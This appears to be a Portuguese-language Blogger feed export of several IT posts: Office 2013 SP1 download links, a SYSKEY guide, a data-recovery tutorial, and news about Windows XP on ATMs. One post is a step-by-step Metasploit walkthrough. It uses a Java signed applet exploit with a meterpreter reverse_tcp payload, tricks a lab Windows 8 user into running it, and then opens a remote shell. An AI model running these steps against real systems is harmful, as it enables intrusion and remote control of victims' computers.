<li style="margin: 0px 0px 15px; padding: 0px;"><span style="margin: 0px; padding: 0px;">Fornece novas aplicações para as capacidades do Office e APIs para desenvolvedores terceiros.</span></li>
<li style="margin: 0px 0px 15px; padding: 0px;"><span style="margin: 0px; padding: 0px;">Fornece suporte para aplicativos do painel de tarefas no Outlook 2013.</span></li>
<li style="margin: 0px 0px 15px; padding: 0px;"><span style="margin: 0px; padding: 0px;">Fornece capacidade de inserir e usar aplicativos de conteúdo no PowerPoint 2013 slides.</span></li>
</ul>
<div style="background-color: white; color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px;">O pacote está disponível tanto para </span><strong style="margin: 0px; padding: 0px;">32-bit</strong><span style="margin: 0px; padding: 0px;"> (x86), bem como </span><strong style="margin: 0px; padding: 0px;">64-bit</strong><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;"> (x64). E</span><span style="margin: 0px; padding: 0px;"> também está disponível para o Microsoft Project 2013, Visio 2013 e SharePoint Designer 2013.</span></span></div>
<div style="background-color: white; color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">Ele está disponível no Windows Update. </span><span style="margin: 0px; padding: 0px;">Se você quiser baixar o instalador offline autônomo, você pode baixá-lo usando os links a seguir:</span></span></div>
<div style="color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<strong style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=42017" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Download Office 2013 Service Pack 1 (SP1) 32-bit</a></span></strong></div>
<div style="color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<strong style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=42006" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Download Office 2013 Service Pack 1 (SP1) 64-bit</a></span></strong></div>
<div style="color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=42013" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Download Project 2013 Service Pack 1 (SP1) 32-bit</a></span></div>
<div style="color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=42020" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Download Project 2013 Service Pack 1 (SP1) 64-bit</a></span></div>
<div style="color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=42018" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Download Visio 2013 Service Pack 1 (SP1) 32-bit</a></span></div>
<div style="color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=42019" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Download Visio 2013 Service Pack 1 (SP1) 64-bit</a></span></div>
<div style="color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=42015" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Download SharePoint Designer 2013 Service Pack 1 (SP1) 32-bit</a></span></div>
<div style="color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=42009" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Download SharePoint Designer 2013 Service Pack 1 (SP1) 64-bit</a></span></div>
<div style="color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=41999" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Download Office 2013 Language Pack Service Pack 1 (SP1) 32-bit</a></span></div>
<div style="background-color: white; color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;"></span></span></div>
<div style="color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=42000" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Download Office 2013 Language Pack Service Pack 1 (SP1) 64-bit</a></span></div>
Guilhermehttp://www.blogger.com/profile/05556516340302955329noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-78612660681175603662014-02-11T15:05:00.000-08:002014-02-11T15:05:11.073-08:00SYSKEY: Está no seu Windows, protege seu PC e você não usa?<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.profissionaisti.com.br/wp-content/uploads/2014/02/syskey-windows-seguranca-senha.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.profissionaisti.com.br/wp-content/uploads/2014/02/syskey-windows-seguranca-senha.jpg" /></a></div>
<br />
O Syskey é uma ferramenta que passou a ser nativa dos sistemas da Microsoft desde o Windows 2000 XP e tem como função adicionar um nível de segurança no pré-carregamento do sistema. Não confundam esta ferramenta com a senha do Setup, que também pode ser quebrada com facilidade.<br />
<br />
<b>Como funciona o Syskey</b><br />
<br />
Os sistemas da Microsoft possuem um banco de dados chamado SAM, onde ficam armazenadas as contas de usuários. Com o Syskey ativo, este banco fica criptografado com uma senha única, ou seja, não importa se você conhece a senha do usuário, pois sem a chave para descriptografar o SAM, o sistema não será carregado e, portanto, nem chegará a carregar as contas de usuários.<br />
<br />
Imagine que as senhas do seu computador são cartões de acesso que estão dentro de um cofre, que por sua vez possui uma chave para ser aberto. Para acessar o computador, você precisará pegar o seu cartão e para isso precisará da chave do cofre. Essa explicação recorda um detalhe: se tiver mais de um usuário deste computador, TODOS eles precisarão dessa chave, pois ela é única. Além disso, vale lembrar que os dados do computador não são criptografados com o SYSKEY, portanto, ele só dificulta o acesso ao sistema, mas os dados poderão ser lidos a partir de outro computador / SO. Para criptografar seus dados, aconselho o uso do Bitlocker, como demonstro neste artigo.<br />
<br />
<b>Agora que sabemos o que ele faz, vamos ativá-lo:</b><br />
<br />
Vá ao EXECUTAR, escreva SYSKEY e aperte ENTER, logo abrirá a janela de ativação do recurso, como mostra a imagem abaixo:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.profissionaisti.com.br/wp-content/uploads/2014/02/syskey.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.profissionaisti.com.br/wp-content/uploads/2014/02/syskey.png" /></a></div>
<br />
Clique em ATUALIZAR e na nova janela selecione e opção INICIALIZAÇÃO DE SENHA<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.profissionaisti.com.br/wp-content/uploads/2014/02/syskey1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.profissionaisti.com.br/wp-content/uploads/2014/02/syskey1.png" height="321" width="640" /></a></div>
<br />
Agora, basta inserir a sua senha, confirmá-la e clicar em OK. Aparecerá uma mensagem de ativação da criptografia, clique em OK e reinicie o PC.<br />
<br />
Pronto! Sempre que ligar o seu computador, precisará inserir a chave Syskey e só depois a sua senha de usuário.<br />
<br />
Esta chave não é inquebrável, mas cria um nível de segurança extra ao seu sistema, sendo mais complexa que a senha comum. Bisbilhoteiros terão mais dificuldade para acessar o seu computador e a maioria desiste.<br />
<br />
Espero que tenham gostado da dica. Deixem seus comentários e críticas.<br />
<br />
Fonte : ProfissionaisTIHC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com1tag:blogger.com,1999:blog-7669976941677173274.post-16312138191668043662014-01-31T07:50:00.000-08:002014-01-31T10:10:55.172-08:00Wise Data Recovery - RECUPERAR DADOS DE HDEste pode ser comparado com o Get Data Back, porém com um detalhe adicional, ele indica quais arquivos estão prontos para uma recuperação completa ou aqueles que terão uma recuperação parcial (quase ilegível) ou os que terão perda total.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img.ibxk.com.br/2012/6/programas/887702817456.jpg?quality=75&width=640" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img.ibxk.com.br/2012/6/programas/887702817456.jpg?quality=75&width=640" height="322" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Com o Wise Data Recovery, você consegue encontrar quase tudo o que já esteve guardado no seu disco rígido e, por algum motivo, foi deletado.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
O programa faz uma varredura em qualquer unidade de armazenamento: HDs, SSDs, pendrives e qualquer outra. Depois disso, o aplicativo parte para a análise dos arquivos e mostra para você se eles são recuperáveis ou não.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Dessa forma, será possível escolher o que vai ser resgatado das profundezas dos seus discos e, além disso, saber se realmente alguma coisa ainda poderá ser útil. Fora isso, se você não conseguir encontrar o que procura na grade de pastas ou na lista geral de arquivos deletados, ainda é possível usar a ferramenta de pesquisa do Wise Data Recovery.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h3>
Escolha o idioma</h3>
<div class="separator" style="clear: both;">
Antes de tudo, você precisa determinar o idioma da interface do aplicativo. Por padrão, o Wise Data Recovery é instalado em inglês, porém você pode usar o programa em português ou em vários outros idiomas. Para isso, procure e clique no botão que fica à esquerda do ícone de minimização da janela, depois selecione “Languages” e escolha “Português (Brasil)”.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img.ibxk.com.br/2012/6/programas/887702817516.jpg?quality=75&width=640" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img.ibxk.com.br/2012/6/programas/887702817516.jpg?quality=75&width=640" height="102" width="640" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<h3>
Em busca do arquivo perdido</h3>
<div class="separator" style="clear: both;">
Para recuperar os dados que foram acidentalmente apagados do seu disco rígido, você precisa ter uma ideia do antigo nome do documento. Com isso em mente, vá ao topo esquerdo da janela do aplicativo e selecione a unidade de armazenamento na qual seu arquivo esteve e clique em “Escanear” ou “Scan”.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
Feito isso, o programa começa a analisar todo o disco e mostra para você o que talvez possa ser recuperado. Caso o nome do arquivo seja um mistério, navegue pela grade de pastas do lado esquerdo da janela e tente encontrar o local em que o documento possa ter estado. Se você se lembrar do nome ou parte dele, vá até a barra de busca, na parte superior direita da janela, e digite o que for preciso até aparecer o que você procura.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img.ibxk.com.br/2012/6/programas/555764527175441.jpg?quality=75&width=640" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img.ibxk.com.br/2012/6/programas/555764527175441.jpg?quality=75&width=640" height="448" width="640" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<h3>
Recupere o seus documentos</h3>
<div class="separator" style="clear: both;">
Quando você finalmente encontrar o seu arquivo perdido, observe o status dele. Se estiver verde, as chances de a recuperação ser bem-sucedida são altas. Caso o mostrador esteja amarelo ou vermelho, mesmo sendo recuperados, os seus documentos talvez fiquem inutilizados.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
Se tudo estiver certo, marque quantos arquivos quiser e clique em “Recuperar” ou “Recovery”. Feito isso, uma pequena janela vai perguntar onde você deseja salvar o resultado da recuperação. Para isso, você deve escolher uma pasta fora do disco em questão, do contrário o aplicativo não realiza a tarefa.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img.ibxk.com.br/2012/6/programas/555764527175623.jpg?quality=75&width=640" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img.ibxk.com.br/2012/6/programas/555764527175623.jpg?quality=75&width=640" height="420" width="640" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
Em alguns segundos, o Wise Data Recovery vai terminar o processo. Clique em “OK” na janela de aviso, e o programa vai abrir a pasta onde você salvou os arquivos recuperados. Agora, só é preciso testar a integridade dos documentos tentando abri-los com o aplicativo-padrão.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<b>Tamanho :</b> 2,5 MB</div>
<div style="text-align: center;">
<a href="http://wisecleaner.com/soft/WDRSetup.exe" target="_blank">DOWNLOAD</a></div>
HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-71649836730335594012014-01-25T10:00:00.004-08:002014-01-25T10:00:48.066-08:00Invasão no Windows 8 através do Java Signed AppletEste vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários a clicaram em links através de textos os imagens esta vulnerabilidade pode ser explorada.<br />
<br />
Conscientize amigos e colegas de trabalho para se atentarem aos links que recebem via e-mail, facebook e ente outros para evitarem se serem vítimas desta vulnerabilidade.<br />
<br />
Uma forma de evitar é manter sempre o Windows e o Antivirus devidamente atualizados.<br />
<br />
<b>Dados Técnicos:</b><br />
<br />
Kali Linux: <span style="color: red;">10.10.10.130</span><br />
Windows 8: <span style="color: red;">10.10.10.129</span><br />
<br />
<b>Passo 01</b><br />
<br />
Execute o MSF Console<br />
<br />
root@kali:~#<span style="color: red;"> msfconsole</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-00.png" height="431" width="640" /></a></div>
<span style="color: red;"><br /></span>
<b>Passo 02</b><br />
<span style="color: red;"><br /></span>
Utilize o exploit java_signed_applet<br />
<span style="color: red;"><br /></span>
<span style="color: red;"></span><br />
msf > use<span style="color: red;"> exploit/multi/browser/java_signed_applet</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-01.png" height="430" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both;">
<b>Passo 04</b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
Defina o servidor Kali Linux <span style="color: red;">(10.10.10.130)</span> como conexão principal do <span style="color: red;">exploit java_signed_applet</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
msf exploit <span style="color: red;">(java_signed_applet)</span> ><span style="color: red;"> set SRVHOST 10.10.10.130</span></div>
<div class="separator" style="clear: both;">
<span style="color: red;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-02.png" height="430" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both;">
<b>Passo 05</b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
Defina a porta do servidor Kali Linux <span style="color: red;">(8080)</span> como conexão principal do <span style="color: red;">exploit java_signed_applet</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
msf exploit <span style="color: red;">(java_signed_applet)</span> > set <span style="color: red;">SRVPORT 8080</span></div>
<div class="separator" style="clear: both;">
<span style="color: red;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-03.png" height="430" width="640" /></a></div>
<span style="color: red;"><br /></span>
<b>Passo 06</b><br />
<span style="color: red;"><br /></span>
Utilize o <b>PAYLOAD</b> <span style="color: red;">reserve_tcp</span> para estabelecer a conexão entre o host e o servidor<br />
<span style="color: red;"><br /></span>
<span style="color: red;"></span><br />
msf exploit<span style="color: red;"> (java_signed_applet) </span>> set<b> PAYLOAD</b> <span style="color: red;">windows/meterpreter/reverse_tcp</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-04.png" height="430" width="640" /></a></div>
<b><br /></b>
<b>Passo 07</b><br />
<span style="color: red;"><br /></span>
Defina o servidor Kali Linux <span style="color: red;">(10.10.10.130) </span>como conexão principal para o <b>PAYLOAD</b> <span style="color: red;">reverse_tcp</span><br />
<br />
<br />
msf exploit <span style="color: red;">(java_signed_applet)</span> > set <b>LHOST</b> <span style="color: red;">10.10.10.130</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-05.png" height="430" width="640" /></a></div>
<span style="color: red;"><br /></span>
<b>Passo 08</b><br />
<span style="color: red;"><br /></span>
Defina a porta do servidor Kali Linux <span style="color: red;">(10.10.10.130)</span> como conexão principal para o <b>PAYLOAD</b> <span style="color: red;">reverse_tcp</span><br />
<br />
<br />
msf exploit<span style="color: red;"> (java_signed_applet)</span> > set <b>LPORT</b> <span style="color: red;">4444</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-06.png" height="430" width="640" /></a></div>
<br />
<b>Passo 09</b><br />
<br />
Execute o <span style="color: red;">exploit</span> para gerar a <span style="color: red;">URL</span> a ser acessada pelo Windows 8 <span style="color: red;">(http://10.10.10.130:8080/clR8lKjmGpiSXqQ)</span><br />
<br />
msf exploit <span style="color: red;">(java_signed_applet)</span> > <b>exploit</b><br />
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-07.png" height="430" width="640" /></a></div>
<b><br /></b>
<b>Passo 10</b><br />
<b><br /></b>
<b></b><br />
No <span style="color: red;">Windows 8</span> ao realizar o acesso ao link<span style="color: red;"> (http://10.10.10.130:8080/clR8lKjmGpiSXqQ) </span>será exibida uma janela de <span style="color: red;">Advertência de Segurança</span>, aceite o Risco e clique em <span style="color: red;">Executar</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-08.png" height="496" width="640" /></a></div>
<span style="color: red;"><br /></span>
<b>Passo 11</b><br />
<br />
<br />
Observe que a conexão foi estabelecida com o servidor<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-09.png" height="430" width="640" /></a></div>
<br />
<b>Passo 12</b><br />
<br />
Execute o comando <span style="color: red;">sessions</span> para exibir as sessões de conexão<br />
<br />
msf exploit <span style="color: red;">(java_signed_applet)</span> > <span style="color: red;">sessions</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-10.png" height="431" width="640" /></a></div>
<span style="color: red;"><br /></span>
<span style="color: red;"><b>Passo 13</b></span><br />
<span style="color: red;"><br /></span>
Estabeleça a conexão na sessão<span style="color: red;"> 1</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;"></span><br />
msf exploit<span style="color: red;"> (java_signed_applet)</span> > sessions<span style="color: red;"> -i 1</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-11.png" height="430" width="640" /></a></div>
<span style="color: red;"><br /></span>
<b>Passo 14</b><br />
<span style="color: red;"><br /></span>
Com a conexão estabelecido digite comando utilizados no windows como o <span style="color: red;">ipconfig</span> para visualizar as conexões de rede<br />
<span style="color: red;"><br /></span>
<span style="color: red;"></span><br />
meterpreter ><span style="color: red;"> ipconfig</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-12.png" height="430" width="640" /></a></div>
<span style="color: red;"><br /></span>
<b>Passo 15</b><br />
<br />
Utilize o comando <span style="color: red;">sysinfo</span> para exibir as Informações de Sistema, como o Nome do Computador e versão do Sistema Operacional<br />
<span style="color: red;"><br /></span>
<span style="color: red;"></span><br />
meterpreter ><span style="color: red;"> sysinfo</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-13.png" height="430" width="640" /></a></div>
<span style="color: red;"><br /></span>
<span style="color: red;"><b>Passo 16</b></span><br />
<span style="color: red;"><br /></span>
Execute o comando<span style="color: red;"> shell </span>para exibir o console do Windows 8<br />
<span style="color: red;"><br /></span>
<span style="color: red;"></span><br />
meterpreter ><span style="color: red;"> shell</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-14.png" height="430" width="640" /></a></div>
<span style="color: red;"><br /></span>
<b>Passo 17</b><br />
<span style="color: red;"><br /></span>
Liste todos arquivos/diretórios que estão no <span style="color: red;">Desktop</span><br />
<br />
<br />
C:\Users\Marcos\Desktop><span style="color: red;">dir</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-15.png" height="431" width="640" /></a></div>
<span style="color: red;"><br /></span>
<b>Passo 18</b><br />
<span style="color: red;"><br /></span>
Crie o diretório <span style="color: red;">100SECURITY</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;"></span><br />
C:\Users\Marcos\Desktop><span style="color: red;">mkdir 100SECURITY</span><br />
<span style="color: red;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-16.png" height="430" width="640" /></a></div>
<b><br /></b>
<b>Passo 19</b><br />
<br />
<br />
Como pode visualizar o diretório <span style="color: red;">100SECURITY</span> foi criado com sucesso<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.100security.com.br/wp-content/uploads/2014/01/invasaow8-17.png" height="496" width="640" /></a></div>
<br />
<b>FONTE :</b> 100security.com.brHC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-57788265690872681322014-01-21T14:57:00.000-08:002014-01-21T14:57:05.026-08:00Fim do suporte ao sistema operacional Windows XP vai forçar bancos a atualizarem o hardware de seus equipamentos<a href="http://3.bp.blogspot.com/-zZi6jCxJCFI/Ut768m-lKcI/AAAAAAAAAxc/pJCY2DSvDXc/s1600/534662702112943-t640.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-zZi6jCxJCFI/Ut768m-lKcI/AAAAAAAAAxc/pJCY2DSvDXc/s1600/534662702112943-t640.jpg" height="212" width="320" /></a>A Microsoft já avisou faz tempo: em 2014 o Windows XP vai perder o suporte e, com isso, deixará de receber atualizações — um ano depois encerram-se também as atualizações vitais para a manutenção da segurança dos usuários. E nesse grupo de usuários estão 95% dos caixas eletrônicos de todo o mundo. Exatamente, a maioria esmagadora das máquinas de bancos são equipadas com computadores que utilizam a referida versão do sistema operacional.<br />
<br />
E o que vai acontecer com elas? Tudo depende de como as instituições bancárias vão querer trabalhar. Segundo o site INFO, aqui no Brasil alguns bancos privados como Bradesco e o Itaú utilizam o sistema Windows XP. O primeiro já informou que vai instalar o Windows 7 nos caixas automáticos, mas o Itaú ainda não revelou o que será feito com seus equipamentos.<br />
<br />
Bancos estatais não terão problemas com a novidade, uma vez que utilizam o sistema Linux em seus equipamentos — isso vale tanto para a Caixa Econômica Federal quanto para o Banco do Brasil. De volta às instituições que precisam realizar a alteração, é preciso mencionar um problema que pode afetar diversas instituições em todo o mundo: o hardware das máquinas utilizadas atualmente.<br />
<br />
<h3>
Hardware é um problema</h3>
<br />
O Windows XP que roda nos caixas automáticos foi lançado em 2001, enquanto o Windows 7 chegou ao mercado oito anos depois. Isso significa que existe quase uma década de diferença nos requisitos mínimos de hardware utilizado. Como você deve imaginar, os computadores dos caixas automáticos não são equipados com componentes muito poderosos, uma vez que executam apenas funções básicas.<br />
<br />
Sabendo disso, não é difícil perceber que muitas máquinas podem não conseguir executar o Windows 7. Ou seja, além de alterar o software utilizado pelos caixas eletrônicos, os bancos ainda terão que modificar os próprios computadores. Dessa maneira, é bem possível que nem todos os bancos consigam realizar a substituição até abril, mês em que o suporte da Microsoft ao Windows XP deve ser encerrado.<br />
<br />
<b>Fonte:</b> Business Week, INFO<br />
<br />
<br />HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-45668788942025316802013-11-22T04:59:00.000-08:002013-11-22T04:59:08.336-08:00Problemas na instalação do Windows partição em formato GPT (como proceder) <div class="separator" style="clear: both; text-align: center;">
